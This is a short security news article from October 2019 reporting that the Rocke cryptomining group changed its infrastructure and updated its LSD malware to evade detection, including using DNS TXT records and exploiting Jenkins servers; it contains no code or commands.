You must Register or Sign in to your Cyware account to perform this action
×Once you are logged in, you will be able to:
Customize your feeds by selecting categories you like
Comment on or Like an article
Receive the latest security stories, trends, and insights in your inbox
Build your profile and login across multiple devices
Bookmark a story and read it later
- Home
- Hacker News
- Threat Actors
- Rocke Threat Actor Group Switches to New Tactics to Evade Detection

Rocke Threat Actor Group Switches to New Tactics to Evade Detection
Rocke Threat Actor Group Switches to New Tactics to Evade Detection- October 17, 2019
- |
- Threat Actors
/https://cystory-images.s3.amazonaws.com/shutterstock_59564641.jpg)
- The Chinese group has changed its Command and Control infrastructure (C&C server).
- It has made some updates to the LSD malware’s source code that includes the addition of the “StartHttpServer” function.
What is the problem?
Researchers have observed that the Chinese cryptomining threat actor group Rocke has changed its tactics, techniques, and procedures (TTPs), to evade detection.
What do we know about the group?
Rocke is a threat actor group that primarily focuses on cryptocurrency mining on compromised machines. This threat group was first spotted by researchers from Cisco Talos in August 2018. This group is known for using malware written in Go.
What’s new?
Rocke has made new updates to its tactics, which include:
- The Chinese group has changed its Command and Control infrastructure (C&C server).
- The group has changed its technique from using “Pastebin” to self-hosting the initial setup script.
- It has made some updates to the LSD malware source code that includes the addition of the “StartHttpServer” function.
- After this change, the malware starts a web server that is listening on localhost and TCP port 65533.
- Rocke has also added a new functionality to the LSD malware for exploiting Jenkins servers.
- Instead of hosting the setup script and update the version on a dedicated host, the threat group is using TXT records.
“Rocke keeps evolving its TTPs in attempts to remain undetected. By moving away from hosting scripts on Pastebin to self-hosted and DNS records, the threat actor is more protected against potential take-downs that could prevent ongoing malicious activity. It is expected that the group will continue to exploit more vulnerabilities to mine additional cryptocurrencies in the near future,” researchers noted.
Get such articles in your inbox
News
-
Previous News US Lawyer Resorted to Cyberattack to Intimidate Critics, Pleads Guilty
- October 17, 2019
- |
- Breaches and Incidents
-
Next News New Cryptojacking Worm ‘Graboid’ Found On Unsecured Docker Hosts
- October 17, 2019
- |
- Malware and Vulnerabilities
Popular News
Related News
Categories
Get such articles in your inbox
News
-
Previous News US Lawyer Resorted to Cyberattack to Intimidate Critics, Pleads Guilty
- October 17, 2019
- |
- Breaches and Incidents
-
Next News New Cryptojacking Worm ‘Graboid’ Found On Unsecured Docker Hosts
- October 17, 2019
- |
- Malware and Vulnerabilities
Popular News
Related News
Categories
